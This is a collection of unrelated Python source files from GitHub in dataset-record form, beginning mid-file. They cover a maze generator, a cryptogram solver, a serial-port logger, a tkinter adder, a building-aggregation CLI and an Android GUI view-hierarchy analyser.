self.n) and self.v[rr][cc] == False:\n q.put((rr, cc))\n self.v[rr][cc] = True\n if d % 2 == 1:\n self.R[r][c - (d == 1)] = True\n else:\n self.D[r - (d == 0)][c] = True\n d = (d + dd) % 4\n\n def random_kruskal_generate(self):\n # the simplest algorithm to realize kruskal\n dots = []\n sets = []\n for i in range(self.m):\n for j in range(self.n):\n dots.append((i, j))\n sets.append(set())\n random.shuffle(dots)\n # print(dots)\n sets_num = 0\n for dot in dots:\n r = dot[0]\n c = dot[1]\n if self.v[r][c] == False:\n self.v[r][c] = True\n sets[sets_num].add((r, c))\n sets_num += 1\n\n d = random.randrange(0, 4)\n tmp = random.randrange(0, 2)\n dd = 1 if tmp == 1 else 3\n for i in range(4):\n rr = r + self.row[d]\n cc = c + self.col[d]\n if (rr >= 0 and rr < self.m) and (cc >= 0 and cc < self.n):\n tmp = self.not_in_same_set(sets, (r,c), (rr, cc))\n # print(tmp)\n judge = tmp[0]\n # print(judge)\n set_num = tmp[1]\n\n if judge == True:\n continue\n pop_item = -1\n for i in range(sets_num):\n if (rr, cc) in sets[i]:\n pop_item = i\n sets_num -= 1\n break\n # merge two set\n if pop_item > -1:\n sets[set_num] = sets[set_num] | sets[pop_item]\n sets.pop(pop_item)\n else:\n sets[set_num].add((rr, cc))\n\n self.v[rr][cc] = True\n if d % 2 == 1:\n self.R[r][c - (d == 1)] = True\n else:\n self.D[r - (d == 0)][c] = True\n d = (d + dd) % 4\n\n @staticmethod\n def not_in_same_set(sets, dot1, dot2):\n num = 0\n for i in sets:\n if dot1 in i:\n if dot2 in i:\n return (True, num)\n else:\n return (False, num)\n num += 1\n return (False, num)\n\n def print_console(self):\n for c in range(self.n):\n print(\"._\", end=\"\")\n print(\".\")\n for r in range(self.m):\n print(\"|\", end=\"\")\n for c in range(self.n):\n if self.D[r][c]:\n print(\" \", end=\"\")\n else:\n print(\"_\", end=\"\")\n if self.R[r][c]:\n print(\".\", end=\"\")\n else:\n print(\"|\", end=\"\")\n print(\"\")\n\nif __name__ == '__main__':\n a = Maze(5, 5 ,50)\n # a.dfs_generate((20, 15))\n a.random_kruskal_generate()\n a.print_console()","repo_name":"AHEADer/pymaze","sub_path":"renderMaze.py","file_name":"renderMaze.py","file_ext":"py","file_size_in_byte":4993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"17231483072","text":"import string\nimport matplotlib.pyplot as plt\nimport pickle\nimport os\n\n\ndef load_word_dictionary(file_path):\n with open(file_path, 'r') as file:\n return set(word.strip().lower() for word in file.readlines())\n\n\ndef get_letter_frequencies(text):\n frequencies = {}\n for char in text:\n if char.isalpha():\n char_lower = char.lower()\n frequencies[char_lower] = frequencies.get(char_lower, 0) + 1\n return frequencies\n\n\ndef decrypt_cryptogram(cryptogram, frequency_map, word_dict):\n alphabet = string.ascii_lowercase\n sorted_freq = sorted(frequency_map.items(),\n key=lambda x: x[1], reverse=True)\n freq_letters = ''.join(letter for letter, _ in sorted_freq)\n\n def decrypt_letter(letter):\n if letter.isalpha():\n index = freq_letters.find(letter.lower())\n decrypted_letter = alphabet[index] if letter.islower(\n ) else alphabet[index].upper()\n return decrypted_letter\n return letter\n\n decrypted_text = ''.join(decrypt_letter(char) for char in cryptogram)\n words = decrypted_text.split()\n decrypted_words = [word if word.lower(\n ) not in word_dict else word_dict[word.lower()] for word in words]\n return ' '.join(decrypted_words)\n\n\ndef guess_word_length(cryptogram):\n spaces = cryptogram.count(' ')\n return len(cryptogram) // (spaces + 1)\n\n\ndef manual_decryption(decrypted_text, cryptogram):\n print(\"\\nManual Decryption:\")\n while True:\n print(\"Current decrypted text:\", decrypted_text)\n guess = input(\"Enter a letter to replace or press 'Enter' to finish: \")\n if not guess:\n break\n replacement = input(f\"Enter the replacement for '{guess}': \")\n decrypted_text = decrypted_text.replace(guess, replacement)\n return decrypted_text\n\n\ndef visualize_frequency(frequency_map):\n sorted_freq = sorted(frequency_map.items(),\n key=lambda x: x[1], reverse=True)\n letters, frequencies = zip(*sorted_freq)\n plt.bar(letters, frequencies)\n plt.xlabel('Letters')\n plt.ylabel('Frequency')\n plt.title('Letter Frequency in the Cryptogram')\n plt.show()\n\n\ndef save_progress(decrypted_text):\n with open('progress.pickle', 'wb') as file:\n pickle.dump(decrypted_text, file)\n\n\ndef load_progress():\n if os.path.exists('progress.pickle'):\n with open('progress.pickle', 'rb') as file:\n return pickle.load(file)\n else:\n return None\n\n\nif __name__ == '__main__':\n cryptogram = input(\"Enter the cryptogram: \")\n word_dict_path = input(\"Enter the path to the word dictionary file: \")\n\n word_dictionary = load_word_dictionary(word_dict_path)\n\n letter_frequencies = get_letter_frequencies(cryptogram)\n decrypted_message = load_progress() or decrypt_cryptogram(\n cryptogram, letter_frequencies, word_dictionary)\n\n print(\"\\nOriginal cryptogram:\", cryptogram)\n print(\"Decrypted message:\", decrypted_message)\n\n word_length_guess = guess_word_length(cryptogram)\n print(f\"Guessed word length: {word_length_guess}\")\n\n visualize_frequency(letter_frequencies)\n\n decrypted_message = manual_decryption(decrypted_message, cryptogram)\n print(\"\\nFinal decrypted message:\", decrypted_message)\n\n save_progress(decrypted_message)\n","repo_name":"avinashkranjan/Amazing-Python-Scripts","sub_path":"Cryptogram Solver/cryptogram_solver.py","file_name":"cryptogram_solver.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","stars":1608,"dataset":"github-code","pt":"83"} +{"seq_id":"5821786201","text":"from datetime import datetime\n\nimport serial\n\nser = serial.Serial('COM3', baudrate=9600)\n\nser.flushInput()\nprintdate = True\n\n\nwhile True:\n try:\n char = (ser.read(1)).decode('ascii')\n if printdate:\n print(datetime.now(), end=\"\\t\")\n printdate = False\n\n if char == '\\n':\n printdate = True\n print(char, end=\"\")\n except serial.SerialException:\n ser = serial.Serial('COM3', baudrate=9600)\n continue\n\n","repo_name":"walczakp/xbox360-flasher","sub_path":"debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"83"} +{"seq_id":"69882469393","text":"import unittest\n\n\nfrom adept.pipeline import Pipeline\n\n\nclass PipelineTest(unittest.TestCase):\n \n def setUp(self):\n self.pipeline = Pipeline()\n\n def test_pipeline(self): \n text = \"Herbs to 40-100 cm tall, annual, much branched. 2 ovaries. 56 stamenoids. Seed volume is about 2 cm³.\" \n fields = self.pipeline(text, 'angiosperm')\n print(fields.to_template())\n \n ASSETS_DATA_DIR / 'fields.tpl.yml'\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"NaturalHistoryMuseum/ADEPT","sub_path":"test/pipeline_test.py","file_name":"pipeline_test.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"32200805992","text":"import tkinter as tk\nimport ctypes\nimport re\n\n# ボタンを選択した場合に、実行される関数\ndef calcAns():\n # entry Widget内へ入力された数字を取得する。\n tmpNumArea1 = numArea1.get()\n tmpNumArea2 = numArea2.get()\n\n # entry Widget内へ数字が入力されなかった場合は、計算しない。\n if not tmpNumArea1 == '' and not tmpNumArea2 == '':\n # label Widgetのtextを再設定(計算結果を書き換え)する。\n # text : テキスト情報\n ansLabel.configure(text=int(tmpNumArea1)+int(tmpNumArea2))\n\n# 入力制限について : https://kuroro.blog/python/YaHEdMd4ScGvrU44zdT6/\ndef onValidate(S):\n # 入力された文字が半角数字の場合\n # reについて : https://note.nkmk.me/python-re-match-search-findall-etc/\n if re.match(re.compile('[0-9]+'), S):\n return True\n else:\n # 入力不正のブザーを鳴らす。\n root.bell()\n return False\n\n# Windowを生成する。\n# Windowについて : https://kuroro.blog/python/116yLvTkzH2AUJj8FHLx/\nroot = tk.Tk()\n# Windowへタイトルをつける。\nroot.title('pythonで足し算')\n# Windowの画面サイズを設定する。\n# geometryについて : https://kuroro.blog/python/rozH3S2CYE0a0nB3s2QL/\nroot.geometry('400x125')\n\n# register : 入力制限を行うための関数の登録を行う。パラメータと関数を紐づけるために必要。\n# 入力制限について : https://kuroro.blog/python/YaHEdMd4ScGvrU44zdT6/\nvcmd = root.register(onValidate)\n\n# Windowを親要素として、label Widgetを作成する。\n# text : テキスト情報\n# font : 文字の大きさや形式を変更する。\n# fontについて : https://kuroro.blog/python/RZNjLl36upkumxwkTRWl/\n# Labelについて : https://kuroro.blog/python/Pj4Z7JBNRvcHZvtFqiKD/\nplusLabel = tk.Label(master=root, text='+', font=100)\n# Windowを親要素として、label Widgetをどのように配置するのか?\n# placeについて : https://kuroro.blog/python/JyaHUKyFyxCa0baFfXg0/\nplusLabel.place(x=141, y=20)\n\n# Windowを親要素として、entry Widgetを作成する。\n# width : 幅の設定\n# font : 文字の大きさや形式を変更する。\n# fontについて : https://kuroro.blog/python/RZNjLl36upkumxwkTRWl/\n# validate : 入力制限するオプションの値を設定。\n# validatecommand : 入力制限用関数の設定。\n# 入力制限について : https://kuroro.blog/python/YaHEdMd4ScGvrU44zdT6/\n# Entryについて : https://kuroro.blog/python/PUZp77YFxrXvMCjpZbUg/\nnumArea1 = tk.Entry(master=root, width=5, font=40, validate=\"key\", validatecommand=(vcmd, '%S'))\n# Windowを親要素として、entry Widgetをどのように配置するのか?\n# placeについて : https://kuroro.blog/python/JyaHUKyFyxCa0baFfXg0/\nnumArea1.place(x=60, y=20)\n\n# Windowを親要素として、entry Widgetを作成する。\n# width : 幅の設定\n# font : 文字の大きさや形式を変更する。\n# fontについて : https://kuroro.blog/python/RZNjLl36upkumxwkTRWl/\n# validate : 入力制限するオプションの値を設定。\n# validatecommand : 入力制限用関数の設定。\n# 入力制限について : https://kuroro.blog/python/YaHEdMd4ScGvrU44zdT6/\n# Entryについて : https://kuroro.blog/python/PUZp77YFxrXvMCjpZbUg/\nnumArea2 = tk.Entry(master=root, width=5, font=40, validate=\"key\", validatecommand=(vcmd, '%S'))\n# Windowを親要素として、entry Widgetをどのように配置するのか?\n# placeについて : https://kuroro.blog/python/JyaHUKyFyxCa0baFfXg0/\nnumArea2.place(x=180, y=20)\n\n# Windowを親要素として、button Widgetを作成する。\n# text : テキスト情報\n# command : ボタンを選択した場合に、実行する関数を設定する。calcAnsとする。\n# font : 文字の大きさや形式を変更する。\n# fontについて : https://kuroro.blog/python/RZNjLl36upkumxwkTRWl/\n# Buttonについて : https://kuroro.blog/python/oFju6EngDtcYtIiMIDf1/\nansBtn = tk.Button(master=root, text='足し算', command=calcAns, font=40)\n# Windowを親要素として、button Widgetをどのように配置するのか?\n# placeについて : https://kuroro.blog/python/JyaHUKyFyxCa0baFfXg0/\nansBtn.place(x=300, y=20)\n\n# Windowを親要素として、label Widgetを作成する。\n# width : 幅の設定\n# font : 文字の大きさや形式を変更する。\n# fontについて : https://kuroro.blog/python/RZNjLl36upkumxwkTRWl/\n# background : 背景色を設定\n# 色について : https://kuroro.blog/python/YcZ6Yh4PswqUzaQXwnG2/\n# Labelについて : https://kuroro.blog/python/Pj4Z7JBNRvcHZvtFqiKD/\nansLabel = tk.Label(master=root, width=5, font=40, background='green')\n# Windowを親要素として、label Widgetをどのように配置するのか?\n# placeについて : https://kuroro.blog/python/JyaHUKyFyxCa0baFfXg0/\nansLabel.place(x=60, y=80)\n\ntry:\n ctypes.windll.shcore.SetProcessDpiAwareness(True)\nexcept:\n pass\n\n# Windowをループさせて、継続的にWindow表示させる。\n# mainloopについて : https://kuroro.blog/python/DmJdUb50oAhmBteRa4fi/\nroot.mainloop()\n","repo_name":"kuroroblog/tkinter-calclate-plus","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"5606301059","text":"import argparse\nimport os\nimport sys\nfrom pathlib import Path\n\n# Add common directory to sys.path\nfrom novelt.lib.thread_utils import run_process_stream_output\n\nCOMMON_DIR = Path(__file__).parent.parent.parent.parent / 'src'\nassert COMMON_DIR.exists()\nsys.path.append(str(COMMON_DIR))\n\nfrom novelt.lib.gdm_utils import run_step, run_gdm, init_log\n\n\ndef gdm_process(start_step, end_step, args):\n\n\n init_log(cfg)\n\n current_step_num = 0\n\n step_list = [\n steps.print_input_info,\n\n steps.step_fix_year1_input,\n\n steps.step_rasterize_year1_input,\n steps.step_rasterize_year2_input,\n\n steps.step_create_new_database,\n\n steps.step_squares_to_database,\n\n steps.step_export_csvs\n\n ]\n\n for step_fn in step_list:\n current_step_num = run_step(cfg, current_step_num, start_step, end_step, step_fn)\n return current_step_num\n\n\n# ------------------------------------------------------------\n# Main program\n# ------------------------------------------------------------\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Aggregates building footprints into settlement extents')\n\n parser.add_argument('--clean', action='store_true',\n help='If set, will set clean flag. This will remove any output for a given step.')\n\n parser.add_argument(\"start_step\", type=int, nargs=\"?\", default=1, help=\"Which step to start running, defaults to 1\")\n parser.add_argument(\"stop_step\", type=int, nargs=\"?\", help=\"Stop executing after running this step\")\n parser.add_argument(\"--group-distance\", type=float, nargs=\"?\", default=0.0008333,\n help=\"How far apart in the reference raster CRS should buildings be considered part of the same settlement\"\n )\n\n parser.add_argument(\"--country\", type=str, help=\"3 letter country ISO code\", required=True)\n\n parser.add_argument(\"--contour-value\", type=int, default=12, nargs=\"?\", help=\"In contour step that draws a contour around dense building squares in the building count raster, defines how many buildings must be in these squares\")\n\n parser.add_argument(\"--contour-min-area\", type=int, default=400000, nargs=\"?\", help=\"Area in square meters of how large the contour area must be to consider a settlement a BUA\")\n\n parser.add_argument('--gen-docs', action='store_true', help=\"If set will generate step documentation\")\n\n parser.add_argument(\"--chunk-rows\", type=int, default=10, nargs=\"?\", help=\"When buildings are split into square chunks, how many rows. Defaults to 10. Increase if a building related step fails due to memory/timeout issues.\")\n parser.add_argument(\"--chunk-cols\", type=int, default=10, nargs=\"?\", help=\"When buildings are split into square chunks, how many columns\")\n\n parser.add_argument(\"--log-level\", type=str, default=\"warn\",\n help=\"Error/Warn/Info/Debug/Trace\")\n\n args = parser.parse_args()\n\n # Given script parameters\n start_step = args.start_step\n\n if not args.stop_step:\n args.stop_step = args.start_step\n\n end_step = args.stop_step\n\n os.environ[\"COUNTRY_CODE\"] = args.country.upper()\n\n if args.gen_docs:\n os.environ[\"GDM_GENERATE_DOCS\"] = \"true\"\n start_step = 1\n end_step = 999\n\n # Import here only after the COUNTRY_CODE has been set because the config will depend on the country code passed in\n from config import Config as cfg\n import steps\n\n # set the values from config that were passed in by command line\n cfg.CLEAN = args.clean\n cfg.GROUP_DISTANCE = args.group_distance\n cfg.CONTOUR_VALUE = args.contour_value\n cfg.CONTOUR_MIN_BUA_AREA = args.contour_min_area\n cfg.CHUNK_ROWS = args.chunk_rows\n cfg.CHUNK_COLS = args.chunk_cols\n cfg.LOG_LEVEL = args.log_level\n\n gdm_process(start_step, end_step, args)\n\n if args.gen_docs:\n run_process_stream_output(f\"\"\"mkdir -p \"{cfg.MODULE_DIR / 'docs'}\" \"\"\")\n doc_output_path = cfg.MODULE_DIR / \"docs\" / \"bldg_agg_script_steps.html\"\n run_process_stream_output(f\"\"\"pandoc --from gfm --to html --standalone --output \"{doc_output_path}\" --metadata pagetitle=\"Building Aggregration Steps\" \"{cfg.MODULE_DIR}/working/doc.md\" \"\"\")\n\n print(f\"Documentation generated in {doc_output_path}\")","repo_name":"novelt/building-aggregation-tool","sub_path":"modules/ID_SET_CMP/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4300,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"83"} +{"seq_id":"1386767045","text":"import os\nimport cv2\nimport json\nfrom os.path import join as pjoin\nimport copy\n\nfrom utils.classification.IconClassifier import IconClassifier\nfrom utils.classification.IconCaption import IconCaption\nfrom utils.ocr.text_detection import text_detection\n\nimport sys\nimport warnings\nsys.path.append('../utils/classification')\nwarnings.filterwarnings(\"ignore\", category=Warning)\n\n\nclass GUI:\n def __init__(self, gui_img_file, gui_json_file, output_file_root='data/twitter/testcase1',\n resize=(1080, 2280), model_icon_caption=None, model_icon_classification=None):\n self.img_file = gui_img_file\n self.json_file = gui_json_file\n self.gui_no = gui_img_file.replace('/', '\\\\').split('\\\\')[-1].split('.')[0]\n\n self.resize = resize\n self.img = cv2.resize(cv2.imread(gui_img_file), resize) # resize the image to be consistent with the vh\n self.json = json.load(open(gui_json_file, 'r', encoding='utf-8')) # json data, the view hierarchy of the GUI\n\n self.element_id = 0\n self.elements = [] # list of element in dictionary {'id':, 'class':...}\n self.elements_leaves = [] # leaf nodes that does not have children\n self.element_tree = None # structural element tree, dict type\n self.blocks = [] # list of blocks from element tree\n self.removed_node_no = 0 # for the record of the number of removed nodes\n\n self.ocr_text = [] # GUI ocr detection result, list of texts {}\n self.model_icon_caption = model_icon_caption # IconCaption\n self.model_icon_classification = model_icon_classification # IconClassification\n\n # output file paths\n self.output_dir = pjoin(output_file_root, 'guidata')\n os.makedirs(self.output_dir, exist_ok=True)\n self.output_file_path_elements = pjoin(self.output_dir, self.gui_no + '_elements.json')\n self.output_file_path_element_tree = pjoin(self.output_dir, self.gui_no + '_tree.json')\n\n def load_elements(self, file_path_elements=None, file_path_element_tree=None):\n if not file_path_elements: file_path_elements = self.output_file_path_elements\n if not file_path_element_tree: file_path_element_tree = self.output_file_path_element_tree\n\n if not os.path.exists(file_path_elements) or not os.path.exists(file_path_element_tree):\n print('Loading FAILED, No such file:', file_path_elements, file_path_element_tree)\n\n print('Load elements from', file_path_elements)\n self.elements = json.load(open(file_path_elements, 'r', encoding='utf-8')) # => self.elements\n self.gather_leaf_elements() # => self.elements_leaves\n self.element_id = self.elements[-1]['id'] + 1 # => self.element_id\n print('Load element tree from', file_path_element_tree)\n self.element_tree = json.load(open(file_path_element_tree, 'r', encoding='utf-8')) # => self.element_tree\n\n '''\n **************************\n *** UI Info Extraction ***\n **************************\n '''\n def ui_info_extraction(self, remove_top_bottom_bars=True):\n '''\n Extract elements from raw view hierarchy Json file and store them as dictionaries\n => self.elements; self.elements_leaves\n '''\n # print('--- Extract elements from VH ---')\n json_cp = copy.deepcopy(self.json)\n element_root = json_cp['activity']['root']\n element_root['class'] = 'root'\n # clean up the json tree to remove redundant layout node\n self.prone_invalid_children(element_root, remove_bars=remove_top_bottom_bars)\n self.remove_redundant_nesting(element_root)\n self.merge_element_with_single_leaf_child(element_root)\n self.extract_children_elements(element_root, 0)\n self.revise_elements_attrs()\n self.gather_leaf_elements()\n # json.dump(self.elements, open(self.output_file_path_elements, 'w', encoding='utf-8'), indent=4)\n # print('Save elements to', self.output_file_path_elements)\n\n def prone_invalid_children(self, element, remove_bars=True):\n '''\n Prone invalid children elements\n Leave valid children and prone their children recursively\n Take invalid children's children as its own directly\n (Optional) Remove top and bottom bars\n '''\n def check_if_element_valid(ele, min_length=5):\n '''\n Check if the element is valid and should be kept\n '''\n if (ele['bounds'][0] >= ele['bounds'][2] - min_length or ele['bounds'][1] >= ele['bounds'][3] - min_length) or \\\n ('layout' in ele['class'].lower() and not ele['clickable']):\n return False\n return True\n\n valid_children = []\n if 'children' in element:\n for child in element['children']:\n # remove bars\n if remove_bars:\n screen_height, screen_width = self.img.shape[:2]\n bounds = child['bounds']\n width = bounds[2] - bounds[0]\n if width / screen_width > 0.95 and \\\n ((bounds[1] / screen_height > 0.9 and bounds[3] == screen_height) or (bounds[3] / screen_height < 0.05 and bounds[1] == 0)):\n continue\n # check invalid elements\n if check_if_element_valid(child):\n valid_children.append(child)\n self.prone_invalid_children(child)\n else:\n valid_children += self.prone_invalid_children(child)\n self.removed_node_no += 1\n element['children'] = valid_children\n return valid_children\n\n def remove_redundant_nesting(self, element):\n '''\n Remove redundant parent node whose bounds are same\n '''\n if 'children' in element and len(element['children']) > 0:\n redundant = False\n new_children = []\n for child in element['children']:\n # inherit clickability\n if element['clickable']:\n child['clickable'] = True\n # recursively inspect child node\n new_children += self.remove_redundant_nesting(child)\n if child['bounds'] == element['bounds']:\n redundant = True\n # only return the children if the node is redundany\n if redundant:\n self.removed_node_no += 1\n return new_children\n else:\n element['children'] = new_children\n return [element]\n\n def merge_element_with_single_leaf_child(self, element):\n '''\n Keep the resource-id and class and clickable of the child element\n '''\n if 'children' in element:\n if len(element['children']) == 1 and 'children' not in element['children'][0]:\n child = element['children'][0]\n element['resource-id'] = child['resource-id'] if 'resource-id' in child else ''\n element['class'] = child['class']\n element['clickable'] = child['clickable']\n self.removed_node_no += 1\n del element['children']\n else:\n new_children = []\n for child in element['children']:\n new_children.append(self.merge_element_with_single_leaf_child(child))\n element['children'] = new_children\n return element\n\n def extract_children_elements(self, element, layer):\n '''\n Recursively extract children from an element\n '''\n element['id'] = self.element_id\n element['layer'] = layer\n self.elements.append(element)\n children_depth = layer # record the depth of the children\n if 'children' in element and len(element['children']) > 0:\n element['children-id'] = []\n for child in element['children']:\n self.element_id += 1\n element['children-id'].append(self.element_id)\n children_depth = max(children_depth, self.extract_children_elements(child, layer+1))\n element['children-depth'] = children_depth\n # replace wordy 'children' with 'children-id'\n del element['children']\n if 'ancestors' in element:\n del element['ancestors']\n return children_depth\n\n def revise_elements_attrs(self):\n '''\n Revise some attributes in elements\n 1. add \"area\"\n 2. keep \"content-desc\" as a string\n '''\n for ele in self.elements:\n bounds = ele['bounds']\n ele['area'] = {'height': int(bounds[2] - bounds[0]), 'length': int(bounds[3] - bounds[1])}\n if 'content-desc' in ele and type(ele['content-desc']) == list:\n if not ele['content-desc'][0]:\n ele['content-desc'] = ''\n else:\n ele['content-desc'] = ','.join(ele['content-desc'])\n\n def gather_leaf_elements(self):\n i = 0\n for ele in self.elements:\n if 'children-id' not in ele:\n ele['leaf-id'] = i\n self.elements_leaves.append(ele)\n i += 1\n\n '''\n *******************\n *** UI Analysis ***\n *******************\n '''\n def ui_analysis_elements_description(self, ocr=True, caption=True, cls=True):\n '''\n Extract description for UI elements through 'text', 'content-desc', 'classification' and 'caption'\n => element['description']\n '''\n # print('--- Analyze UI elements ---')\n # use ocr to detect text\n if ocr: self.ocr_detect_gui_text()\n # generate caption for non-text elements\n if caption: self.caption_elements()\n # classify non-text elements\n if cls: self.classify_elements()\n # extract element description from 'text', 'content-desc', 'icon-cls' and 'caption'\n for ele in self.elements_leaves:\n description = ''\n # check text\n if 'text' in ele and len(ele['text']) > 0:\n description += ele['text']\n # check content description\n if 'content-desc' in ele and len(ele['content-desc']) > 0 and ele['content-desc'] != ele['text']:\n description = ele['content-desc'] if len(description) == 0 else description + ' / ' + ele['content-desc']\n # if no text and content description, check caption\n if len(description) == 0:\n if 'icon-cls' in ele and ele['icon-cls']:\n description = ele['icon-cls']\n elif 'caption' in ele and '' not in ele['caption']:\n description = ele['caption']\n else:\n description = None\n ele['description'] = description\n # save the elements with 'description' attribute\n json.dump(self.elements, open(self.output_file_path_elements, 'w', encoding='utf-8'), indent=4)\n # print('Save elements to', self.output_file_path_elements)\n\n def ocr_detect_gui_text(self):\n scale_w = self.resize[0] / self.img.shape[1]\n scale_h = self.resize[1] / self.img.shape[0]\n\n def scale_text_bounds(bounds):\n return [bounds[0] * scale_w, bounds[1] * scale_h,\n bounds[2] * scale_w, bounds[3] * scale_h]\n\n def match_text_and_element(ele):\n '''\n Match ocr text and element through iou\n '''\n for text in self.ocr_text:\n t_b, e_b = text['bounds'], ele['bounds']\n # calculate intersected area between text and element\n intersected = max(0, min(t_b[2], e_b[2]) - max(t_b[0], e_b[0])) * max(0, min(t_b[3], e_b[3]) - max(t_b[1], e_b[1]))\n if intersected > 0:\n ele['ocr'] = ' '.join([ele['ocr'], text['content']])\n ele['text'] = ' '.join([ele['text'], text['content']])\n\n # google ocr detection for the GUI image\n self.ocr_text = text_detection(self.img_file)\n for t in self.ocr_text:\n t['bounds'] = scale_text_bounds(t['bounds'])\n\n # merge text to elements according to position\n for element in self.elements_leaves:\n if 'text' not in element or element['text'] == '':\n element['ocr'] = ''\n element['text'] = ''\n match_text_and_element(element)\n\n def caption_elements(self, elements=None):\n if self.model_icon_caption is None:\n self.model_icon_caption = IconCaption(vocab_path='../utils/classification/model_results/vocab_idx2word.json',\n model_path='../utils/classification/model_results/labeldroid.pt')\n elements = self.elements_leaves if elements is None else elements\n clips = []\n for ele in elements:\n bound = ele['bounds']\n clips.append(self.img[bound[1]: bound[3], bound[0]:bound[2]])\n captions = self.model_icon_caption.predict_images(clips)\n for i, ele in enumerate(elements):\n ele['caption'] = captions[i]\n\n def classify_elements(self, elements=None):\n if self.model_icon_classification is None:\n self.model_icon_classification = IconClassifier(model_path='../utils/classification/model_results/best-0.93.pt',\n class_path='../utils/classification/model_results/iconModel_labels.json')\n elements = self.elements_leaves if elements is None else elements\n clips = []\n for ele in elements:\n bound = ele['bounds']\n clips.append(self.img[bound[1]: bound[3], bound[0]:bound[2]])\n classes = self.model_icon_classification.predict_images(clips)\n for i, ele in enumerate(elements):\n if classes[i][1] > 0.95:\n ele['icon-cls'] = classes[i][0]\n else:\n ele['icon-cls'] = None\n\n '''\n ***********************\n *** Structural Tree ***\n ***********************\n '''\n def ui_element_tree(self):\n '''\n Form a hierarchical element tree with a few key attributes to represent the vh\n => self.element_tree\n => self.blocks\n '''\n # print('--- Generate element tree ---')\n self.element_tree = self.combine_children_to_tree(self.elements[0])\n json.dump(self.element_tree, open(self.output_file_path_element_tree, 'w'), indent=4)\n # print('Save element tree to', self.output_file_path_element_tree)\n\n def combine_children_to_tree(self, element):\n element_cp = copy.deepcopy(element)\n if 'children-id' in element_cp:\n element_cp['children'] = []\n for c_id in element_cp['children-id']:\n element_cp['children'].append(self.combine_children_to_tree(self.elements[c_id]))\n self.select_ele_attr(element_cp, ['scrollable', 'id', 'resource-id', 'class', 'clickable', 'children', 'description', 'area'])\n else:\n self.select_ele_attr(element_cp, ['id', 'resource-id', 'class', 'clickable', 'children', 'description', 'area'])\n self.simplify_ele_attr(element_cp)\n return element_cp\n\n def select_ele_attr(self, element, selected_attrs):\n element_cp = copy.deepcopy(element)\n for key in element_cp.keys():\n if key == 'selected' and element[key]:\n continue\n if key not in selected_attrs or element[key] is None or element[key] == '':\n del(element[key])\n\n def simplify_ele_attr(self, element):\n if 'resource-id' in element:\n element['resource-id'] = element['resource-id'].replace('com', '')\n element['resource-id'] = element['resource-id'].replace('android', '')\n element['resource-id'] = element['resource-id'].replace('..', '.')\n element['resource-id'] = element['resource-id'].replace('.:', ':')\n if 'class' in element:\n element['class'] = element['class'].replace('android', '')\n element['class'] = element['class'].replace('..', '.')\n element['class'] = element['class'].replace('.:', ':')\n\n def get_ui_element_node_by_id(self, ele_id):\n ele_id = int(ele_id)\n if ele_id >= len(self.elements):\n print('No element with id', ele_id, 'is found')\n return None\n return self.search_node_by_id(self.element_tree, ele_id)\n\n def search_node_by_id(self, node, ele_id):\n if node['id'] == ele_id:\n return node\n if node['id'] > ele_id:\n return None\n if 'children' in node:\n last_child = None\n for child in node['children']:\n if child['id'] == ele_id:\n return child\n if child['id'] > ele_id:\n break\n last_child = child\n return self.search_node_by_id(last_child, ele_id)\n\n '''\n *********************\n *** Visualization ***\n *********************\n '''\n def show_each_element(self, only_leaves=False):\n board = self.img.copy()\n if only_leaves:\n elements = self.elements_leaves\n print(len(elements))\n else:\n elements = self.elements\n for ele in elements:\n print(ele['class'])\n print(ele, '\\n')\n bounds = ele['bounds']\n clip = self.img[bounds[1]: bounds[3], bounds[0]: bounds[2]]\n color = (0,255,0) if not ele['clickable'] else (0,0,255)\n cv2.rectangle(board, (bounds[0], bounds[1]), (bounds[2], bounds[3]), color, 3)\n cv2.imshow('clip', cv2.resize(clip, (clip.shape[1] // 3, clip.shape[0] // 3)))\n cv2.imshow('ele', cv2.resize(board, (board.shape[1] // 3, board.shape[0] // 3)))\n if cv2.waitKey() == ord('q'):\n break\n cv2.destroyAllWindows()\n\n def show_all_elements(self, only_leaves=False):\n board = self.img.copy()\n if only_leaves:\n elements = self.elements_leaves\n else:\n elements = self.elements\n for ele in elements:\n bounds = ele['bounds']\n color = (0,255,0) if not ele['clickable'] else (0,0,255)\n cv2.rectangle(board, (bounds[0], bounds[1]), (bounds[2], bounds[3]), color, 3)\n cv2.imshow('elements', cv2.resize(board, (board.shape[1] // 3, board.shape[0] // 3)))\n key = cv2.waitKey()\n # cv2.destroyWindow('elements')\n return key\n\n def show_element(self, element, show_children=True):\n board = self.img.copy()\n color = (0,255,0) if not element['clickable'] else (0,0,255)\n bounds = element['bounds']\n cv2.rectangle(board, (bounds[0], bounds[1]), (bounds[2], bounds[3]), color, 3)\n if show_children and 'children-id' in element:\n for c_id in element['children-id']:\n bounds = self.elements[c_id]['bounds']\n cv2.rectangle(board, (bounds[0], bounds[1]), (bounds[2], bounds[3]), (255,0,255), 3)\n cv2.imshow('element', cv2.resize(board, (board.shape[1] // 3, board.shape[0] // 3)))\n cv2.waitKey()\n cv2.destroyWindow('element')\n\n def show_element_by_id(self, ele_id, show_children=True):\n element = self.elements[ele_id]\n self.show_element(element, show_children)\n\n def show_screen(self):\n cv2.imshow('screen', self.img)\n cv2.waitKey()\n cv2.destroyWindow('screen')\n\n\nif __name__ == '__main__':\n load = False\n gui = GUI(gui_img_file='data/rico/raw/0.png',\n gui_json_file='../data/rico/raw/0.json',\n output_file_root='../data/rico/guidata',\n resize=(1440, 2560))\n # load previous result\n if load:\n gui.load_elements()\n # process from scratch\n else:\n gui.ui_info_extraction()\n gui.ui_analysis_elements_description()\n gui.ui_element_tree()\n 